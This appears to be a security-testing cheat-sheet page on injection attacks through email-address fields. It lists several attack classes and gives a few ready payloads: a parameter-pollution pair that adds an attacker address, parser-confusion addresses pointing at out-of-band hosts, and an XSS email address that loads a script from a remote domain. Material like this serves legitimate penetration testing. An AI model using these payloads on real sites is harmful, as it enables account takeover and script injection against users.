Email injections

Emails injection: XSS, SQLi, SSTI, etc.

ko-fi

user[email][]=valid@email.com&user[email][]=attacker@email.com

Punnycode

Check Email Registration

Registration Form

Parser Abuse - Domain confusion

oastify.com!collab\@example.com
collab%psres.net(@example.com

XSS

XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required).

"><img/src/onerror=import('//domain/')>"@yourdomain.com

XSS

SSTI

SSRF

CRLF

CRLF InjectionPassword Reset

Register or reset password

SQL Injection

SQL Injection

Command Injection

Command Injection

Open Redirection

Bypass Access Control

HTML injection - Subscription form

Resources

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

ko-fi

buymeacoffee

Last updated